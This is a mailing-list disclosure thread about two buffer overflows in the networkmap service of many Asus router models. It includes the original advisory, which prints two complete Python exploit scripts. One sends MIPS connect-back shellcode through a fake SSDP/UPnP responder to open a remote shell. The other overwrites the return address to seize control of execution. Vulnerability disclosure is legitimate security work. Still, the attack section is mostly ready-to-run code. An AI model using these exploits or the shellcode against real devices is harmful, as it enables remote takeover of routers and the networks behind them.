Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 14 Jul 2017 11:23:56 +0800
From: "598930392@...com" <598930392@...com>
To: oss-security <oss-security@...ts.openwall.com>
Cc: "Zach W" <kestrel@...linux.us>
Subject: Re: Re: Asus wireless routers Global buffer overflow and Stack buffer overflow in networkmap


Thanks for your reply.
Although they are all about the networkmap, this two vulnerabilities are different from the CVE-2017-6548.
The CVE-2017-6548 is located in the function process_device_response, it be triggered when parsing an SSDP response packet with a long "host" or "port".
This two vulnerabilities is located in the function store_description, they are triggered when parsing a device descirption xml.
You can refer to the latest Asuswrt-Merlin firmware source code, and the CVE-2017-6548 has been repaired, but this two vulnerabilities are existent:
   https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032 

We can't find a way to contact ASUS vendors, so we'd like to get two CVE for these two vulnerabilities, so that maybe ASUS vendors can fix them quickly.


GbigMao(逢坂河河), 598930392@...com
 
From: Zach W
Date: 2017-07-14 02:39
To: oss-security; 逢坂河河、、
Subject: Re: [oss-security] Asus wireless routers Global buffer overflow and Stack buffer overflow in networkmap
Is this different from CVE-2017-6548?
 
Zach W.
 
 
On 7/12/17 12:52 AM, 逢坂河河、、 wrote:
> =============================================================
>                                                Global buffer overflow
> =============================================================
>
> [Vulnerability]:
> Global buffer overflow in networkmap
>
>
> ------------------------------------------
> [Exploitation]:
> Can write data at any address in heap
>
>
> ------------------------------------------
> [Vendor of Product]:
> Asus wireless router
>
>
> ------------------------------------------
> [Affected Products and firmware version]:
> Asuswrt-Merlin ,all the firmware and the latest firmware is 380.66_6
> RT-AC5300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT_AC1900P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC68U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC68P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC88U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC66U_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC58U ,all the firmware,and the latest firmware is 3.0.0.4.380.7485
> RT-AC56U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC55U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-AC52U ,all the firmware,and the latest firmware is 3.0.0.4.380.4180
> RT-AC51U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N18U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-N66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N56U ,all the firmware,and the latest firmware is 3.0.0.4.378.7177
> RT-AC3200 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC3100 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT_AC1200GU ,all the firmware,and the latest firmware is 3.0.0.4.380.5577
> RT_AC1200G ,all the firmware,and the latest firmware is 3.0.0.4.380.3167
> RT-AC1200 ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
> RT-AC53 ,all the firmware,and the latest firmware is 3.0.0.4.380.9883
> RT-N12HP ,all the firmware,and the latest firmware is 3.0.0.4.380.2943
> RT-N12HP_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.3479
> RT-N12D1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N12+ ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT_N12+_PRO ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
> RT-N16 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
>
>
> ------------------------------------------
> [Attack Type]:
> Remote
>
>
> ------------------------------------------
> [Can Cause Denial of Service?]:
> yes
>
>
> ------------------------------------------
> [Reference]:
> https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
> http://asuswrt.lostrealm.ca/
> https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/  (chose the others can download the firmware sourcecode)
> https://www.asus.com/Networking/Wireless-Routers-Products/
>
>
> ------------------------------------------
> [Discoverer]:
> Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
>
>
> ------------------------------------------
> [Affected components]:
> Affected executable application: networkmap
> Affected source code file: \release\src\router\networkmap\function.c
> Affected function: store_description(char *msg)
>
>
> ------------------------------------------
> [Vulnerability description]:
> When the function process_device_repsonse of networkmap is parsing the 
> SSDP answer from a device and the SSDP answer has indicated the location like:
> HTTP/1.1 200 OK
> Location:HTTP://host:port/path
> If the "HTTP://host:port/path" is valid, the networkmap will get the 
> device descirption xml by accessing "HTTP://host:port/path",and it will use 
> the function store_description to store the device descirption information 
> to global sturct device_info.
> In the function store_description,there's no limit to the variable s_num,
> so that it can cause the global sturct device_info overflow when copy the
> data from tmp to description.service[s_num].url .
>
>
> ------------------------------------------
> [Vulnerability details]:
> In the \release\src\router\networkmap\function.c,
> It define the global struct device_info description and the function store_description:
> ...
> struct device_info description;
> ...
> void store_description(char *msg)
> {
> ...
>         int s_num = 0;
> ...
> while( p!= NULL && p < body)
>         {
> ...
> switch(type)
> {
> ...
>         case 7:
>             strlcpy(description.service[s_num].url, tmp, sizeof(description.service[s_num].url));
>             NMP_DEBUG_F("service %d url = %s\n", s_num, tmp);
>             s_num++;
>             break;
>         }
>         }
>         ...
> }
>
>
> You can see that the s_num variable is incremented in case 7,
> But in the while( p!= NULL && p < body),it never check the s_num variable.
> And in the \release\src\router\networkmap\networkmap.h,it define the struct device_info:
> ...
> #define LINE_SIZE               200
> #define SERVICE_NUM             10
> struct service
> {
>         char name[LINE_SIZE];
>         char url[LINE_SIZE];
> };
> struct device_info
> {
>         char friendlyname[LINE_SIZE];
>         char manufacturer[LINE_SIZE];
>         char description[LINE_SIZE];
>         char modelname[LINE_SIZE];
>         char modelnumber[LINE_SIZE];
>         char presentation[LINE_SIZE];
>         struct service service[SERVICE_NUM];
>         int service_num;
> };
>
>
> Because SERVICE_NUM = 10,so,in the case 7 which in the function store_description, 
> when the s_num variable has be incremented and the s_num > 10,
> the data copy to struct device_info description.service[s_num].url will overflow.
>
>
> ------------------------------------------
> [Exploitation details]:
> When the networkmap get the device descirption xml by accessing "HTTP://host:port/path",
> we can respond a device descirption xml like:
> <?xml><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL>shellcode<></root>
> the shellcode will be written to the memory that out of the global struct device_info description.
>
>
> And then,because the memory maps for networkmap is:
> admin@...N12HP_B1:/# cat /proc/$(pidof networkmap)/maps
> 00400000-0040a000 r-xp 00000000 1f:02 104        /usr/sbin/networkmap
> 0041a000-0041b000 rw-p 0000a000 1f:02 104        /usr/sbin/networkmap
> 0041b000-00420000 rwxp 0041b000 00:00 0          [heap]
> 2aaa8000-2aaae000 r-xp 00000000 1f:02 733        /lib/ld-uClibc.so.0
> 2aaae000-2aaaf000 rw-p 2aaae000 00:00 0 
> 2aab0000-2aab6000 rw-s 00000000 00:07 0          /SYSV000003e9 (deleted)
> 2aab6000-2aaba000 rw-s 00000000 00:07 32769      /SYSV000003ea (deleted)
> 2aabd000-2aabe000 r--p 00005000 1f:02 733        /lib/ld-uClibc.so.0
> 2aabe000-2aabf000 rw-p 00006000 1f:02 733        /lib/ld-uClibc.so.0
> 2aabf000-2aaeb000 r-xp 00000000 1f:02 164        /usr/lib/libshared.so
> 2aaeb000-2aafa000 ---p 2aaeb000 00:00 0 
> 2aafa000-2aafe000 rw-p 0002b000 1f:02 164        /usr/lib/libshared.so
> 2aafe000-2ab0f000 rw-p 2aafe000 00:00 0 
> 2ab0f000-2ab11000 r-xp 00000000 1f:02 235        /usr/lib/libnvram.so
> 2ab11000-2ab21000 ---p 2ab11000 00:00 0 
> 2ab21000-2ab22000 rw-p 00002000 1f:02 235        /usr/lib/libnvram.so
> 2ab22000-2ab30000 r-xp 00000000 1f:02 732        /lib/libgcc_s.so.1
> 2ab30000-2ab40000 ---p 2ab30000 00:00 0 
> 2ab40000-2ab41000 rw-p 0000e000 1f:02 732        /lib/libgcc_s.so.1
> 2ab41000-2ab79000 r-xp 00000000 1f:02 728        /lib/libc.so.0
> 2ab79000-2ab89000 ---p 2ab79000 00:00 0 
> 2ab89000-2ab8a000 rw-p 00038000 1f:02 728        /lib/libc.so.0
> 2ab8a000-2ab8e000 rw-p 2ab8a000 00:00 0 
> 2ab8e000-2ab96000 r--s 00000000 00:0b 297        /dev/nvram
> 7fc20000-7fc35000 rwxp 7fc20000 00:00 0          [stack]
> 7fff7000-7fff8000 r-xp 7fff7000 00:00 0          [vdso]
>
>
> Both the Program address and the Heap address are not randomized and Continuous.
> So when the global struct device_info overflow ,the shellcode could be write to 
> the heap ,and the shellcode address in the heap is fixed and Controllable.
>
>
> ------------------------------------------
> [exp.py]:
> # Tested product and firmware version:
> # RT-N12HP_B1 (3.0.0.4.380.3479)
>
>
> # coding=utf-8
>
>
> ROUTER_IP = '192.168.2.1'     #asus wireless router ip
> IP = '192.168.2.31'         #attacker ip
> INTERACE = 'eth0'     #attacker host network interface
> CONNECTBACK_IP = '192.168.2.31' #the host ip use for connectback shell shellcode
> #the default connectback port is 30583
>                                 
> import time
> import socket
> import sys
> import os
> import threading
> import socketserver
>
>
> sc = '<?xml><SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += '<>'
> sc += '<SCPDURL>'
> sc += b'\xff\xff\x04\x28'
> sc += b'\xbb\x0f\x02\x24'
> sc += b'\x0c\x01\x01\x01'
> sc += b'\xfa\xff\x0f\x24'
> sc += b'\x27\x78\xe0\x01'
> sc += b'\xfd\xff\xe4\x21'
> sc += b'\xfd\xff\xe5\x21'
> sc += b'\xff\xff\x06\x28'
> sc += b'\x57\x10\x02\x24'
> sc += b'\x0c\x01\x01\x01'
> sc += b'\xff\xff\xa2\xaf'
> sc += b'\xff\xff\xa4\x8f'
> sc += b'\xfd\xff\x11\x24'
> sc += b'\x27\x88\x20\x02'
> sc += b'\xe2\xff\xb1\xa7'
> sc += b'\x77\x77\x0e\x24'
> sc += b'\xe4\xff\xae\xa7'
> sc += socket.inet_aton(CONNECTBACK_IP)[0] + socket.inet_aton(CONNECTBACK_IP)[1] + b'\x0e\x34'
> sc += b'\xe6\xff\xae\xa7'
> sc += socket.inet_aton(CONNECTBACK_IP)[2] + socket.inet_aton(CONNECTBACK_IP)[3] + b'\x0e\x24'
> sc += b'\xe8\xff\xae\xa7'
> sc += b'\xe2\xff\xa5\x27'
> sc += b'\xef\xff\x0c\x24'
> sc += b'\x27\x30\x80\x01'
> sc += b'\x4a\x10\x02\x24'
> sc += b'\x0c\x01\x01\x01'
> sc += b'\x21\x28\x20\x02'
> sc += b'\xdf\x0f\x02\x24'
> sc += b'\x0c\x01\x01\x01'
> sc += b'\xff\xff\x10\x24'
> sc += b'\xff\xff\x31\x22'
> sc += b'\xfa\xff\x30\x16'
> sc += b'\xff\xff\x06\x28'
> sc += b'\x2f\x2f\x0f\x24'
> sc += b'\xec\xff\xaf\xa7'
> sc += b'\x62\x69\x0f\x24'
> sc += b'\xee\xff\xaf\xa7'
> sc += b'\x6e\x2f\x0e\x24'
> sc += b'\xf0\xff\xae\xa7'
> sc += b'\x73\x68\x0e\x24'
> sc += b'\xf2\xff\xae\xa7'
> sc += b'\xf4\xff\xa0\xaf'
> sc += b'\xec\xff\xa4\x27'
> sc += b'\xf8\xff\xa4\xaf'
> sc += b'\xfc\xff\xa0\xaf'
> sc += b'\xf8\xff\xa5\x27'
> sc += b'\xab\x0f\x02\x24'
> sc += b'\x0c\x01\x01\x01'
> sc += '<></root>'
>
>
> def mac():
>     os.system('macchanger -A {}'.format(INTERACE))
>
>
> os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP))
>
>
> class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
>
>
>     def handle(self):
>         print('[-] got shellcode request')
>         self.request.recv(1024)
>         print("[-] sending shellcode")
>         self.request.send(sc)
>
>
> class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
>     pass
>
>
> socketserver.TCPServer.allow_reuse_address = True
> server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
> t = threading.Thread(target=server.serve_forever)
> t.start()
>
>
> print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction")
>
>
> addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
> s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
> s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
> s.bind(('239.255.255.250', 1900))
> s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))
>
>
> mac()
> times = 0
> state = 'Overflow'
>
>
> while True:
>     data, sender = s.recvfrom(1500)
>     if sender[0] == ROUTER_IP and sender[1] == 1008:
>         print("[-] received SSDP M-SEARCH Package")
>
>
>         data = {}
>         data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/A\r\n\r\n'
>
>
>         sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
>         sock.sendto(data[state], sender)
>
>
>         if state == 'Overflow':
>             print("[-] Send the GetXmlRequest to router")
>             time.sleep(20)
>             os._exit(0)
>
>
>
> =============================================================
>                                                Stack buffer overflow
> =============================================================
>
>
> [Vulnerability]:
> Stack buffer overflow in networkmap
>
>
> ------------------------------------------
> [Exploitation]:
> Can control the $pc.
> Together with the above Global buffer overflow vulnerability,
> can remote code execution and then get a connectback shell. 
>
>
> ------------------------------------------
> [Vendor of Product]:
> Asus wireless router
>
>
> ------------------------------------------
> [Affected Products and firmware version]:
> Asuswrt-Merlin ,all the firmware and the latest firmware is 380.66_6
> RT-AC5300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT_AC1900P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC68U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC68P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC88U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC66U_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC58U ,all the firmware,and the latest firmware is 3.0.0.4.380.7485
> RT-AC56U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC55U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-AC52U ,all the firmware,and the latest firmware is 3.0.0.4.380.4180
> RT-AC51U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N18U ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-N66U ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N56U ,all the firmware,and the latest firmware is 3.0.0.4.378.7177
> RT-AC3200 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT-AC3100 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
> RT_AC1200GU ,all the firmware,and the latest firmware is 3.0.0.4.380.5577
> RT_AC1200G ,all the firmware,and the latest firmware is 3.0.0.4.380.3167
> RT-AC1200 ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
> RT-AC53 ,all the firmware,and the latest firmware is 3.0.0.4.380.9883
> RT-N12HP ,all the firmware,and the latest firmware is 3.0.0.4.380.2943
> RT-N12HP_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.3479
> RT-N12D1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N12+ ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT_N12+_PRO ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
> RT-N16 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
> RT-N300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7378
>
>
> ------------------------------------------
> [Attack Type]:
> Remote
>
>
> ------------------------------------------
> [Can Cause Denial of Service?]:
> yes
>
>
> ------------------------------------------
> [Reference]:
> https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
> http://asuswrt.lostrealm.ca/
> https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/  (chose the others can download the firmware sourcecode)
> https://www.asus.com/Networking/Wireless-Routers-Products/
>
>
> ------------------------------------------
> [Discoverer]:
> Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
>
>
> ------------------------------------------
> [Affected components]:
> Affected executable application: networkmap
> Affected source code file: \release\src\router\networkmap\function.c
> Affected function: store_description(char *msg)
>
>
> ------------------------------------------
> [Vulnerability details]:
> When the function process_device_repsonse of networkmap is parsing the SSDP answer 
> from a device and the SSDP answer has indicated the location like:
> HTTP/1.1 200 OK
> Location:HTTP://host:port/path
> If the "HTTP://host:port/path" is valid, the networkmap will get the device descirption 
> xml by accessing "HTTP://host:port/path",and it will use the function store_description 
> to store the device descirption information to global sturct device_info.
>
>
> In the switch case 6 which in the function store_description:
>
>
>     case 6: // tmp="urn:schemas-upnp-org:service:serviceType:v"
> mxend = tmp;
> i = 0; j = 0;
> while(i != 4)
> {
> if(i == 3)
> tmp[j++] = *mxend;
> if(*mxend == ':')
> i++;
> mxend++;
> }
> tmp[j-1] = '\0';
> strlcpy(description.service[s_num].name, tmp, sizeof(description.service[s_num].name));
> NMP_DEBUG_F("service %d name = %s\n", s_num, tmp);
> break;
> 
> if it couldn't found the fourth ':' in the stack, the stack buffer tmp will be overflow, 
> and this stack-based overflow can be used to gain control over networkmap’s control flow 
> by overwriting the saved $ra stored on the stack.
>
>
> ------------------------------------------
> [Exploitation details]:
> when answer the SSDP request, we can send the SSDP answer message like:
> 'HTTP/1.1 200 OK\r\nLocation:HTTP://192.168.2.31:1337/' + 'B'*231 + b'\x41\x41\x41:' + '\r\n\r\n'
> And When the networkmap get the device descirption xml by accessing "HTTP://192.168.2.31:1337/",
> we can respond a device descirption xml like:
> <?xml><serviceType>AAAA<></root>
> And then, after the code in case 6,the stack buffer tmp will be overflow,and the 
> data start from stack buffer tmp will become 'B'*231 + b'\x41\x41\x41',
> and it lead to the $ra and $pc being set to 0x00414141.
>
>
> Now we can control the $pc by overwriting the saved $ra stored on the stack. 
> For further exploitation,to get a ConnectBack shell,we can use the "Write data
> at any address in heap" vulnerability which also in function store_description,
> to write the ConnectBack shell shellcode on a fixed heap address,and then we 
> can use this Code Execution vulnerability to let $pc be set as the ConnectBack shell shellcode address.
>
>
> ------------------------------------------
> [exp.py]:
> # Tested product and firmware version:
> # RT-N12HP_B1 (3.0.0.4.380.3479)
>
>
> # coding=utf-8
>
>
> ROUTER_IP = '192.168.2.1'     #asus wireless router ip
> IP = '192.168.2.31'         #attacker ip
> INTERACE = 'eth0'     #attacker host network interface
>
>
> import time
> import socket
> import sys
> import os
> import threading
> import socketserver
>
>
> sc = '<?xml>'
> sc += '<serviceType>'
> sc += b'AAAA' * 49
> sc += 'AA<></root>'
>
>
> def mac():
>     os.system('macchanger -A {}'.format(INTERACE))
>
>
> os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP))
>
>
> class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
>
>
>     def handle(self):
>         print('[-] got xml request')
>         self.request.recv(1024)
>         print("[-] sending xml")
>         self.request.send(sc)
>
>
> class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
>     pass
>
>
> socketserver.TCPServer.allow_reuse_address = True
> server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
> t = threading.Thread(target=server.serve_forever)
> t.start()
>
>
> print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction")
>
>
> addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
> s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
> s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
> s.bind(('239.255.255.250', 1900))
> s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))
>
>
> mac()
> times = 0
> state = 'Overflow'
>
>
> while True:
>     data, sender = s.recvfrom(1500)
>     if sender[0] == ROUTER_IP and sender[1] == 1008:
>         print("[-] received SSDP M-SEARCH Package")
>
>
>         data = {}
>         data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/' + 'B'*231 + b'\xe0\xbb\x41:' + '\r\n\r\n'
>
>
>         sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
>         sock.sendto(data[state], sender)
>
>
>         if state == 'Overflow':
>             print("[-] Send the GetXmlRequest to router")
>             time.sleep(20)
>             os._exit(0)
 

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ